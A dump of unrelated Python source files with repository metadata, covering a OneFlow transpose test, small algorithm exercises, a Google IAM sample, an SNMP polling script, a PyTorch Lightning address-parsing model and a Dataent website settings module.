from oneflow.compatible.single_client import typing as tp
gpus = tf.config.experimental.list_physical_devices("GPU")
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
def compare_with_tensorflow(device_type, input_shape, perm):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
@flow.global_function(type="train", function_config=func_config)
def TransposeJob():
with flow.scope.placement(device_type, "0:0"):
x = flow.get_variable(
"input",
shape=input_shape,
dtype=flow.float,
initializer=flow.random_uniform_initializer(minval=2, maxval=5),
trainable=True,
)
loss = flow.transpose(x, perm)
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.0001]), momentum=0
).minimize(loss)
flow.watch(x, test_global_storage.Setter("x"))
flow.watch_diff(x, test_global_storage.Setter("x_diff"))
flow.watch(loss, test_global_storage.Setter("loss"))
flow.watch_diff(loss, test_global_storage.Setter("loss_diff"))
return loss
of_out = TransposeJob().get()
with tf.GradientTape(persistent=True) as tape:
x = tf.Variable(test_global_storage.Get("x"))
tf_out = tf.transpose(x, perm)
loss_diff = test_global_storage.Get("loss_diff")
tf_x_diff = tape.gradient(tf_out, x, loss_diff)
assert np.allclose(of_out.numpy(), tf_out.numpy(), rtol=1e-05, atol=1e-05)
assert np.allclose(
test_global_storage.Get("x_diff"), tf_x_diff.numpy(), rtol=1e-05, atol=1e-05
)
@flow.unittest.skip_unless_1n1d()
class TestTranspose(flow.unittest.TestCase):
def test_transpose(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11, 12, 13)]
arg_dict["perm"] = [(2, 0, 1, 3), (1, 0, 2, 3), (3, 2, 1, 0), (3, 1, 2, 0)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose2(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11, 12)]
arg_dict["perm"] = [(2, 0, 1), (1, 0, 2), (2, 1, 0), (1, 2, 0)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose3(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11)]
arg_dict["perm"] = [(1, 0), (0, 1)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose_dim6(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(2, 3, 4, 5, 6, 7)]
arg_dict["perm"] = [(2, 0, 1, 3, 5, 4)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
8fa4de3bff6962cb85451b714b9b0e03e4eec89b
|
fb47e95101efd3b3a40ac73dcf58ed0440dec928
|
/find missing number in the series.py
|
fedd41ede866e30cd091191227488c8fe132df98
|
[
"MIT"
] |
permissive
|
sundar369/coding
|
5a474f471041061b859795b6190793f19a1bcbc1
|
d5e99623f055a39604351752d494c1c8817d6d91
|
refs/heads/main
| 2022-12-19T15:55:11.584832
| 2020-10-21T06:43:27
| 2020-10-21T06:43:27
| 305,928,000
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
n = int(input())
arr = list(map(int,input().split()))
dif = int((arr[-1] - arr[0])/n)
inc = 1
ele = arr[0]
while True:
ele += dif
if ele != arr[inc]:
print(ele)
break
inc += 1
|
[
"noreply@github.com"
] |
noreply@github.com
|
b057a3a5c3f3098da54c67a78d50a565061a32c3
|
0dfa97730b9ad9c077868a045d89cc0d4b09f433
|
/tests/integration/goldens/credentials/samples/generated_samples/iamcredentials_generated_credentials_v1_iam_credentials_sign_blob_sync.py
|
ff60375d5635f5825a6f29c36bb0c61572147d95
|
[
"Apache-2.0"
] |
permissive
|
anukaal/gapic-generator-python
|
546c303aaf2e722956133b07abb0fb1fe581962f
|
e3b06895fa179a2038ee2b28e43054e1df617975
|
refs/heads/master
| 2023-08-24T23:16:32.305652
| 2021-10-09T15:12:14
| 2021-10-09T15:12:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,567
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for SignBlob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-iam-credentials
# [START iamcredentials_generated_credentials_v1_IAMCredentials_SignBlob_sync]
from google.iam import credentials_v1
def sample_sign_blob():
"""Snippet for sign_blob"""
# Create a client
client = credentials_v1.IAMCredentialsClient()
# Initialize request argument(s)
request = credentials_v1.SignBlobRequest(
name="projects/{project}/serviceAccounts/{service_account}",
payload=b'payload_blob',
)
# Make the request
response = client.sign_blob(request=request)
# Handle response
print(response)
# [END iamcredentials_generated_credentials_v1_IAMCredentials_SignBlob_sync]
|
[
"noreply@github.com"
] |
noreply@github.com
|
f9472b9609eb5b6bde651f529d644276ff63fe2c
|
ab73f80a80d77d826ae347bdea7f74f93cf71c3c
|
/python/tests/test_array_reverse.py
|
a3a26d9c1a0ae1b83ad77df70505d167f5c22695
|
[] |
no_license
|
moh-ash96/data-structures-and-algorithms
|
4c7f7b7598d50bfc0fc96f20751598aa412a26d6
|
bc42163393aa835c9e763e6848335c8a14cc2832
|
refs/heads/master
| 2023-06-03T21:37:14.740791
| 2021-06-29T14:48:12
| 2021-06-29T14:48:12
| 348,101,936
| 0
| 3
| null | 2021-06-29T14:27:49
| 2021-03-15T19:44:23
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 265
|
py
|
from code_challenges.array_reverse.array_reverse import reverseArray
def test_array ():
assert reverseArray([1, 2, 3, 4, 5, 6]) == [6, 5, 4, 3, 2, 1]
assert reverseArray([89, 2354, 3546, 23, 10, -923, 823, -12]) == [-12, 823, -923, 10, 23, 3546, 2354, 89]
|
[
"moh.ash96@gmail.com"
] |
moh.ash96@gmail.com
|
0870115ce996bd2ba821fa63ddbc96a6a15f12d1
|
badaf185bf21ab3318ef340d2c5b428f1f83f43f
|
/snmp/ex4_week2.py
|
fde07320ad5d75e856a29e4065542052833d47a1
|
[
"Apache-2.0"
] |
permissive
|
cfalco73/python_class
|
48259956f047c8fc32430b16a0335bc782b2d7e3
|
a2a0628c6f3480d502816d34b7ba05d974feca0a
|
refs/heads/master
| 2021-04-12T08:08:49.424416
| 2018-04-13T21:23:48
| 2018-04-13T21:23:48
| 126,092,245
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 580
|
py
|
#!/usr/bin/env python
from __future__ import print_function, unicode_literals
from snmp_helper import snmp_get_oid,snmp_extract
COMMUNITY_STRING = 'galileo'
SNMP_PORT = 161
MIB_DESC = '1.3.6.1.2.1.1.1.0'
MIB_NAME = '1.3.6.1.2.1.1.5.0'
router_1 = ("184.105.247.70", COMMUNITY_STRING, SNMP_PORT)
router_2 = ("184.105.247.71", COMMUNITY_STRING, SNMP_PORT)
for router_device in (router_1, router_2):
for oid_info in (MIB_DESC, MIB_NAME):
snmp_info = snmp_get_oid(router_device, oid=oid_info)
output = snmp_extract(snmp_info)
print (output)
print()
|
[
"carlo_falco@hotmail.com"
] |
carlo_falco@hotmail.com
|
da0a868e0dc20cb2ab7909a7a40490865620d82e
|
2a409a3f43fdbad202e9827e4fffd615a734c78b
|
/spotifylyrics/config.py
|
56ac99332601cb8675a52a1bf3468090829627c8
|
[
"MIT"
] |
permissive
|
Turreted/Spotify-Lyrics
|
db2c9e4f3de2441ce5874a9a5932866464451d86
|
6bbbf6c29f6183536668e557e8aebe70a0d2f5e3
|
refs/heads/master
| 2021-06-19T03:10:58.723203
| 2021-06-13T14:31:05
| 2021-06-13T14:31:05
| 176,770,294
| 24
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
import os
import pathlib
"""
Defines application constants
"""
# Spotify application constants
# the unique id for the Spotify application used to read data
CLIENT_ID = "cabed21db9c54f13b906e562bc864c26"
REDIRECT_URI = "http://localhost:8080/callback/"
# directory constants, not meant to be used directly by program
__dir_path = os.path.dirname(os.path.realpath(__file__))
__project_root = pathlib.Path(__dir_path).parent
SECRETS_CACHE = os.path.join(__dir_path, "cache/secrets.json")
|
[
"gideonmitchell01@gmail.com"
] |
gideonmitchell01@gmail.com
|
94d7d573288eb90d05e576a11a91c7c3562fa982
|
231c81317b3ae93237cc3a6f55f924c8bc3cadf3
|
/loca_test_v2_lang.py
|
dc314e071e5a1e97f82a8912ca306e6c2a1aaf53
|
[] |
no_license
|
qianpeisheng/indo
|
2acd394051ee0f18dc01a8577d4a60507888a8a1
|
2abe017c61eb33d466d382d92614e56e2605a663
|
refs/heads/main
| 2023-03-24T07:52:43.350718
| 2021-03-20T18:56:48
| 2021-03-20T18:56:48
| 348,845,962
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,986
|
py
|
import os
import torch
from datasets import load_dataset
from torch import nn
import torch.nn.functional as F
from transformers import (AutoModel, BertTokenizer, AutoConfig, DataCollatorForLanguageModeling) # AutoModelForMaskedLM
from torch.utils.data import DataLoader, random_split # AutoTokenizer
from torchvision import transforms
import pytorch_lightning as pl
from pytorch_lightning.callbacks import ModelCheckpoint
import gzip
import csv
from sklearn.metrics import accuracy_score
from tokenizers import Tokenizer
from tokenizers.models import BPE
from tokenizers.trainers import BpeTrainer
from tokenizers.pre_tokenizers import Whitespace
import pandas as pd
import datetime
# Configs
model_name = 'indobenchmark/indobert-lite-base-p1'
max_seq_length = 167 # for train and test
preprocessing_num_workers = 4
batch_size=2048 # depend on gpu memory
# utils
def get_pos(index1, index2, embedding, cls_):
val1, pos1 = torch.max(embedding[:,:,index1], dim=1)
val2, pos2 = torch.max(embedding[:,:,index2], dim=1)
for i, v in enumerate(cls_):
if index2 < 2: # poi
if v == 0 or v == 2:
pos1[i] = 0
pos2[i] = 0
else: # street
if v == 0 or v == 1:
pos1[i] = 0
pos2[i] = 0
return pos1, pos2
# out[0] **is** out.last_hidden_state
class IndBert(nn.Module):
def __init__(self):
super(IndBert, self).__init__()
model = AutoModel.from_pretrained(model_name)
model.resize_token_embeddings(30521)
# https://github.com/huggingface/transformers/issues/4153
self.bert = model
self.linear = nn.Linear(in_features=768, out_features=4, bias=True)
# 4 for poi start and end, street start and end
self.linear_cls = nn.Linear(in_features=768, out_features=4, bias=True)
def forward(self, input_ids, attention_mask, token_type_ids):
out = self.bert(input_ids, attention_mask, token_type_ids)# (hidden_state, pooled_out)
out_sentence = out.last_hidden_state[:,1:,:]
out_cls = out.last_hidden_state[:,0,:]
out_cls = self.linear_cls(out_cls)
out_sentence = self.linear(out_sentence)
return out_cls, out_sentence
class My_lm(pl.LightningModule):
def __init__(self):
super().__init__()
# self.save_hyperparameters()
# config = AutoConfig.from_pretrained(
# model_name_or_path=model_name, return_dict=True)
self.model = IndBert()
def forward(self, input_ids, attention_mask, token_type_ids):
# in lightning, forward defines the prediction/inference actions
out_cls, embedding = self.model(input_ids, attention_mask, token_type_ids)
return out_cls, embedding
def reshape_(self, x):
_x = torch.stack(x,dim=0)
_x = torch.transpose(_x , 0, 1)
return _x
def training_step(self, batch, batch_idx):
# training_step defined the train loop. It is independent of forward
# barch
input_ids = batch['input_ids']
input_ids = self.reshape_(input_ids)
attention_mask = batch['attention_mask']
attention_mask = self.reshape_(attention_mask)
token_type_ids = batch['token_type_ids']
token_type_ids = self.reshape_(token_type_ids)
poi_start = batch['POI'][0]
poi_end = batch['POI'][1]
street_start = batch['street'][0]
street_end = batch['street'][1]
out_cls, embedding = self(input_ids, attention_mask, token_type_ids)
# loss
cls_loss = F.cross_entropy(out_cls, batch['cls_label'])
# compute poi loss, where cls label =1 or 3
poi_mask = batch['cls_label'] %2 == 1
poi_loss = 0
for index, poi in enumerate(poi_mask):
if poi:
poi_loss += F.cross_entropy(embedding[index,:,0].unsqueeze(dim=0), poi_start[index].unsqueeze(dim=0))
poi_loss += F.cross_entropy(embedding[index,:,1].unsqueeze(dim=0), poi_end[index].unsqueeze(dim=0))
# compute street loss, where cls label =2 or 3 (3 is calculated above)
street_mask = batch['cls_label'] == 2
street_loss = 0
for index, street in enumerate(street_mask):
if street:
street_loss += F.cross_entropy(embedding[index,:,2].unsqueeze(dim=0), street_start[index].unsqueeze(dim=0))
street_loss += F.cross_entropy(embedding[index,:,3].unsqueeze(dim=0), street_end[index].unsqueeze(dim=0))
total_loss = (cls_loss + poi_loss + street_loss)/3 # consider scale cls_loss larger, as found in Squad 2.0 paper
self.log('train_loss', total_loss, on_step=True, prog_bar=True)
self.log('cls_loss', cls_loss, on_step=True)
self.log('poi_loss', poi_loss, on_step=True)
self.log('street_loss', street_loss, on_step=True)
return {'loss': total_loss, 'cls': cls_loss, 'poi': poi_loss, 'street': street_loss} # must contrain key loss
# https://github.com/PyTorchLightning/pytorch-lightning/issues/2783#issuecomment-710615867
def training_epoch_end(self, train_step_outs):
epoch_train_loss = 0
epoch_cls_loss = 0
epoch_poi_loss = 0
epoch_street_loss = 0
for d in train_step_outs:
epoch_train_loss += d['loss']
epoch_cls_loss += d['cls']
epoch_poi_loss += d['poi']
epoch_street_loss += d['street']
self.log('loss', epoch_train_loss/len(train_step_outs), on_epoch=True, prog_bar=True)
self.log('poi_start', epoch_cls_loss/len(train_step_outs), on_epoch=True, prog_bar=True)
self.log('poi_end', epoch_poi_loss/len(train_step_outs), on_epoch=True, prog_bar=True)
self.log('street_start', epoch_street_loss/len(train_step_outs), on_epoch=True, prog_bar=True)
def validation_step(self, batch, index):
# batch
input_ids = batch['input_ids']
input_ids = self.reshape_(input_ids)
attention_mask = batch['attention_mask']
attention_mask = self.reshape_(attention_mask)
token_type_ids = batch['token_type_ids']
token_type_ids = self.reshape_(token_type_ids)
poi_start = batch['POI'][0]
poi_end = batch['POI'][1]
street_start = batch['street'][0]
street_end = batch['street'][1]
out_cls, embedding = self(input_ids, attention_mask, token_type_ids)
# loss
cls_loss = F.cross_entropy(out_cls, batch['cls_label'])
# compute poi loss, where cls label =1 or 3
poi_mask = batch['cls_label'] %2 == 1
poi_loss = 0
for index, poi in enumerate(poi_mask):
if poi:
poi_loss += F.cross_entropy(embedding[index,:,0].unsqueeze(dim=0), poi_start[index].unsqueeze(dim=0))
poi_loss += F.cross_entropy(embedding[index,:,1].unsqueeze(dim=0), poi_end[index].unsqueeze(dim=0))
# compute street loss, where cls label =2 or 3 (3 is calculated above)
street_mask = batch['cls_label'] == 2
street_loss = 0
for index, street in enumerate(street_mask):
if street:
street_loss += F.cross_entropy(embedding[index,:,2].unsqueeze(dim=0), street_start[index].unsqueeze(dim=0))
street_loss += F.cross_entropy(embedding[index,:,3].unsqueeze(dim=0), street_end[index].unsqueeze(dim=0))
total_loss = (cls_loss + poi_loss + street_loss)/3
# acc
_, cls_ = torch.max(out_cls, dim=1)
pred_poi_start, pred_poi_end = get_pos(0,1, embedding, cls_)
pred_street_start, pred_street_end = get_pos(2,3, embedding, cls_)
def get_acc(pred, gt):
return torch.tensor(accuracy_score(pred.cpu(), gt.cpu()))
val_accs = [get_acc(pred_poi_start, poi_start), get_acc(pred_poi_end, poi_end), get_acc(pred_street_start, street_start), get_acc(pred_street_end, street_end)]
self.log('val_loss', total_loss, on_step=True)
self.log('poi_start', val_accs[0], on_step=True)
self.log('poi_end', val_accs[1], on_step=True)
self.log('street_start', val_accs[2], on_step=True)
self.log('street_end', val_accs[3], on_step=True)
return {'val_loss': total_loss, 'poi_start': val_accs[0], 'poi_end': val_accs[1], 'street_start': val_accs[2], 'street_end': val_accs[3]}
# may use F1 to measure the performance
def validation_epoch_end(self, valid_step_outs):
epoch_val_loss = 0
epoch_accs = [0,0,0,0]
for d in valid_step_outs:
epoch_val_loss += d['val_loss']
epoch_accs[0] += d['poi_start']
epoch_accs[1] += d['poi_end']
epoch_accs[2] += d['street_start']
epoch_accs[3] += d['street_end']
self.log('val_loss', epoch_val_loss/len(valid_step_outs), on_epoch=True, prog_bar=True)
self.log('poi_start', epoch_accs[0]/len(valid_step_outs), on_epoch=True, prog_bar=True)
self.log('poi_end', epoch_accs[1]/len(valid_step_outs), on_epoch=True, prog_bar=True)
self.log('street_start', epoch_accs[2]/len(valid_step_outs), on_epoch=True, prog_bar=True)
self.log('street_end', epoch_accs[3]/len(valid_step_outs), on_epoch=True, prog_bar=True)
def test_step(self, batch, batch_idx):
# batch
input_ids = batch['input_ids']
input_ids = self.reshape_(input_ids)
attention_mask = batch['attention_mask']
attention_mask = self.reshape_(attention_mask)
token_type_ids = batch['token_type_ids']
token_type_ids = self.reshape_(token_type_ids)
out_cls, embedding = self(input_ids, attention_mask, token_type_ids)
# map ids to tokens
_, cls_ = torch.max(out_cls, dim=1)
pred_poi_start, pred_poi_end = get_pos(0,1, embedding, cls_)
pred_street_start, pred_street_end = get_pos(2,3, embedding, cls_)
tokenizer = BertTokenizer.from_pretrained("indobenchmark/indobert-base-p1") # make this global
def decode_(pred_start, pred_end):
rets = []
for index, (start, end) in enumerate(zip(pred_start, pred_end)):
if start == 0 and end == 0:
current_ret = ''
else:
# limit end to the length of the input, to avoid [SEP] and [PAD]
# Note that decoder skips special tokens, so end may > len(input_ids)
current_input_ids = input_ids[index]
end = min(len(current_input_ids), end)
current_ret = tokenizer.decode(current_input_ids[start+1:end+1], skip_special_tokens=True)
rets.append(current_ret)
return rets
pois = decode_(pred_poi_start, pred_poi_end)
streets = decode_(pred_street_start, pred_street_end)
return (pois, streets)
def test_epoch_end(self, test_outs):
# save file
answers = []
for pois, streets in test_outs:
for poi, street in zip(pois, streets):
answers.append(poi+'/'+street)
df_answer = pd.DataFrame({'id': range(len(answers)), 'POI/street': answers})
filename1 = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
df_answer.to_csv(filename1+'.csv', index=False)
return filename1
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(), lr=3e-05, eps=1e-08) # check requires grad
# 3e-5
class Dm(pl.LightningDataModule):
def __init__(self, batch_size=batch_size):
super().__init__()
self.train_file = 'train.csv'
self.valid_file = 'train.csv'
self.test_file = 'test.csv'
self.batch_size = batch_size
# When doing distributed training, Datamodules have two optional arguments for
# granular control over download/prepare/splitting data:
# OPTIONAL, called for every GPU/machine (assigning state is OK)
def setup(self, stage=None):
# step is either 'fit', 'validate', 'test', or 'predict'. 90% of the time not relevant
# load dataset
# datasets = load_dataset('csv', data_files='train.csv', split=['train[:80%]', 'train[80%:]'])
# column_names = ['id', 'raw_address', 'POI/street']
tokenizer = BertTokenizer.from_pretrained("indobenchmark/indobert-base-p1")
#pad 0 https://huggingface.co/transformers/model_doc/bert.html
def tokenize_fn(entry):
encoded = tokenizer.encode(entry['raw_address'])
# also handle the labels here
def find_sublist(lst1, lst2):
lst1 = lst1[1:len(lst1)-1]
lst2 = lst2[1:len(lst2)-1]
if len(lst1) == 0 or len(lst2) == 0:
return (0, 0)
for i in range(len(lst2)-len(lst1)+1):
if lst2[i:i+len(lst1)] == lst1:
# return i+1, i+len(lst1)+1
return i, i+len(lst1) # [TODO] debug on this plus 1 due to splitting [CLS] at start of sequence
else:
return (0, 0) # -1 triggers index out of bound error
labels = entry['POI/street'].split('/')
encoded_poi = tokenizer.encode(labels[0])
entry_poi_pos = find_sublist(encoded_poi, encoded)
encoded_street = tokenizer.encode(labels[1])
entry_street_pos = find_sublist(encoded_street, encoded)
cls_label = 0
if labels[0]:
cls_label += 1
if labels[1]:
cls_label += 2
return {'POI':entry_poi_pos, 'street': entry_street_pos, 'cls_label': cls_label}
# datasets = [dataset.map(lambda entries: tokenizer(entries['raw_address'], padding=True), batched=True, batch_size=batch_size, num_proc=1) for dataset in datasets]
# tokenized_d_train, tokenized_d_valid = [dataset.map(tokenize_fn, num_proc=preprocessing_num_workers) for dataset in datasets] # attempts to avoid size mismatch
# self.train_dataset = tokenized_d_train
# self.valid_dataset = tokenized_d_valid
# test dataset
# see how it performs on train
test_d = load_dataset('csv', data_files='test.csv', split='train[:100%]') # adjust the ratio for debugging
tokenized_d_test = test_d.map(lambda entries: tokenizer(entries['raw_address'], padding=True), batched=True, batch_size=batch_size, num_proc=1)
self.test_dataset = tokenized_d_test# ['train'] # named by the dataset module
def train_dataloader(self):
return DataLoader(self.train_dataset, batch_size=self.batch_size, num_workers=1, drop_last=True)
def val_dataloader(self):
return DataLoader(self.valid_dataset, batch_size=self.batch_size, num_workers=1, drop_last=True)
def test_dataloader(self):
return DataLoader(self.test_dataset, batch_size=self.batch_size, num_workers=1)
checkpoint_callback = ModelCheckpoint(
monitor='val_loss',
dirpath='.',
filename='bert-ind-{epoch:02d}-{val_loss:.2f}',
save_top_k=10,
mode='min',
)
dm = Dm()
lm = My_lm()
# # debug
# trainer = pl.Trainer(gpus=1, overfit_batches=1)
# trainer = pl.Trainer(gpus=1, fast_dev_run=True)# , profiler='simple')
# trainer = pl.Trainer(gpus=1, max_epochs=1, callbacks=[checkpoint_callback])
# trainer = pl.Trainer(gpus=1, max_epochs=10, limit_train_batches=10, limit_val_batches=3, callbacks=[checkpoint_callback])
# standard train, validation and test
# trainer = pl.Trainer(gpus=1, max_epochs=50, callbacks=[checkpoint_callback])
# trainer.fit(lm,dm)
# result = trainer.test()
# # testing only
# # use larger batch size to speed up testing
dm.setup()
model = lm.load_from_checkpoint('legend/bert-ind-epoch=039-val_loss=0.40.ckpt')
trainer = pl.Trainer(gpus=1)
result = trainer.test(model, test_dataloaders=dm.test_dataloader())
|
[
"qpeisheng@gmail.com"
] |
qpeisheng@gmail.com
|
19102a19834c96bbcc0fad460eac549a8e9a3f99
|
495d05bf59a650da83119e3e796f1978fc0d5081
|
/第九章/9.3.py
|
b6ece6eb0e8895913ba67c7d3152770ac3094773
|
[] |
no_license
|
jaredchin/Core-Python-Programming
|
776e69764656cee8ffe3257dd953166a761099c1
|
a081560e78685634f29c89d109efd99b3100eb73
|
refs/heads/master
| 2021-09-10T17:56:50.288037
| 2018-03-30T15:09:04
| 2018-03-30T15:09:04
| 111,692,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 195
|
py
|
import os
fobj = open('test.txt', 'w')
while True:
aLine = input("Enter a line ('.' to quit): ")
if aLine != ".":
fobj.write('%s\n' % aLine)
else:
break
fobj.close()
|
[
"1007707989@qq.com"
] |
1007707989@qq.com
|
b1561a5a09375df8219b095e33b192ffafb03de1
|
eb755b42aa2ec9e6ab63001a6293d5e225837086
|
/Other_web_spider/Phantomjs/Phantomjs_id_location.py
|
f4b494cfe8dbfb44c591643255e8da05cbfcbc6d
|
[] |
no_license
|
paramedick/python-web-crawlers
|
7c493cbc51c4189d0dabaeae6cfba84123f7401d
|
5deea2073583bbb8d229c6404680e543ebcdbc5b
|
refs/heads/master
| 2022-01-19T21:25:29.058709
| 2019-08-13T14:43:22
| 2019-08-13T14:43:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
# coding=utf-8
from selenium import webdriver
browser = webdriver.Firefox()
browser.get("http://www.baidu.com/")
browser.find_element_by_id("kw").send_keys("python")
browser.implicitly_wait(60)
browser.quit()
|
[
"429095816@qq.com"
] |
429095816@qq.com
|
3aee936d5111a837b9237d8b38ceb76fc98be8fe
|
e44cf49719aa36ee4fc7314ca624cd37d04efc88
|
/442-find-all-duplicates-in-an-array.py
|
592d200f353d2ae15fb28e535a7312ad5f08e508
|
[] |
no_license
|
tiaotiao/leetcode
|
3115d8a64353aa236c25a6af266ee54bfab7d44b
|
88afef5388e308e6da5703b66e07324fb1723731
|
refs/heads/master
| 2020-05-21T13:47:20.264552
| 2018-09-19T22:52:28
| 2018-09-19T22:52:28
| 65,435,630
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
class Solution:
def findDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
res = []
for i in range(len(nums)):
idx = abs(nums[i]) - 1
if nums[idx] > 0:
nums[idx] = -nums[idx]
else:
res.append(idx + 1)
return res
def main():
s = Solution()
nums = [4,3,2,7,8,2,3,1]
print(s.findDuplicates(nums))
if __name__ == '__main__':
main()
|
[
"tiaotiaoyly@gmail.com"
] |
tiaotiaoyly@gmail.com
|
f39918fe446e14b7afba346efa267b6e087a3fe4
|
ad784ca84b36073cd6abc3c29b696ffc08d3851f
|
/practice2.py
|
018468b2acb9a777bfe9263503094aa8e2ef3441
|
[] |
no_license
|
YogeshwaranaPachiyappan/Python
|
356f0114e03cb017cc15e842815177fe3e18f1bb
|
01d7383c0691f57eb8640bad668c563998946671
|
refs/heads/master
| 2020-12-04T05:31:51.343612
| 2020-07-28T04:51:03
| 2020-07-28T04:51:03
| 231,633,361
| 0
| 0
| null | 2020-04-08T03:22:11
| 2020-01-03T17:23:04
|
Python
|
UTF-8
|
Python
| false
| false
| 59
|
py
|
s=input()
a=s.split()
print(len(a))
print(a.upper(:1))
|
[
"noreply@github.com"
] |
noreply@github.com
|
b3cdcb8ef497d5e18564d7b7f47262c537e111e3
|
b89ec2839b4a6bd4e2d774f64be9138f4b71a97e
|
/dataent/website/doctype/website_settings/website_settings.py
|
4fc4412d550622749995427444bce0dbc835241c
|
[
"MIT"
] |
permissive
|
dataent/dataent
|
ec0e9a21d864bc0f7413ea39670584109c971855
|
c41bd5942ffe5513f4d921c4c0595c84bbc422b4
|
refs/heads/master
| 2022-12-14T08:33:48.008587
| 2019-07-09T18:49:21
| 2019-07-09T18:49:21
| 195,729,981
| 0
| 0
|
MIT
| 2022-12-09T17:23:49
| 2019-07-08T03:26:28
|
Python
|
UTF-8
|
Python
| false
| false
| 4,869
|
py
|
# Copyright (c) 2015, Dataent Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import dataent
from dataent import _
from dataent.utils import get_request_site_address, encode
from dataent.model.document import Document
from six.moves.urllib.parse import quote
from dataent.website.router import resolve_route
from dataent.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
def validate(self):
self.validate_top_bar_items()
self.validate_footer_items()
self.validate_home_page()
def validate_home_page(self):
if dataent.flags.in_install:
return
if self.home_page and not resolve_route(self.home_page):
dataent.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
self.home_page = ''
def validate_top_bar_items(self):
"""validate url in top bar items"""
for top_bar_item in self.get("top_bar_items"):
if top_bar_item.parent_label:
parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
if not parent_label_item:
# invalid item
dataent.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
dataent.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
top_bar_item.idx))
def validate_footer_items(self):
"""validate url in top bar items"""
for footer_item in self.get("footer_items"):
if footer_item.parent_label:
parent_label_item = self.get("footer_items", {"label": footer_item.parent_label})
if not parent_label_item:
# invalid item
dataent.throw(_("{0} does not exist in row {1}").format(footer_item.parent_label, footer_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
dataent.throw(_("{0} in row {1} cannot have both URL and child items").format(footer_item.parent_label,
footer_item.idx))
def on_update(self):
self.clear_cache()
def clear_cache(self):
# make js and css
# clear web cache (for menus!)
dataent.clear_cache(user = 'Guest')
from dataent.website.render import clear_cache
clear_cache()
# clears role based home pages
dataent.clear_cache()
def get_website_settings():
hooks = dataent.get_hooks()
context = dataent._dict({
'top_bar_items': get_items('top_bar_items'),
'footer_items': get_items('footer_items'),
"post_login": [
{"label": _("My Account"), "url": "/me"},
# {"class": "divider"},
{"label": _("Logout"), "url": "/?cmd=web_logout"}
]
})
settings = dataent.get_single("Website Settings")
for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
"facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup", "hide_footer_signup", "head_html", "title_prefix",
"navbar_search"]:
if hasattr(settings, k):
context[k] = settings.get(k)
if settings.address:
context["footer_address"] = settings.address
for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup"]:
context[k] = int(context.get(k) or 0)
if dataent.request:
context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
context.encoded_title = quote(encode(context.title or ""), str(""))
for update_website_context in hooks.update_website_context or []:
dataent.get_attr(update_website_context)(context)
context.web_include_js = hooks.web_include_js or []
context.web_include_css = hooks.web_include_css or []
via_hooks = dataent.get_hooks("website_context")
for key in via_hooks:
context[key] = via_hooks[key]
if key not in ("top_bar_items", "footer_items", "post_login") \
and isinstance(context[key], (list, tuple)):
context[key] = context[key][-1]
add_website_theme(context)
if not context.get("favicon"):
context["favicon"] = "/assets/dataent/images/favicon.png"
if settings.favicon and settings.favicon != "attach_files:":
context["favicon"] = settings.favicon
return context
def get_items(parentfield):
all_top_items = dataent.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield= %s
order by idx asc""", parentfield, as_dict=1)
top_items = [d for d in all_top_items if not d['parent_label']]
# attach child items to top bar
for d in all_top_items:
if d['parent_label']:
for t in top_items:
if t['label']==d['parent_label']:
if not 'child_items' in t:
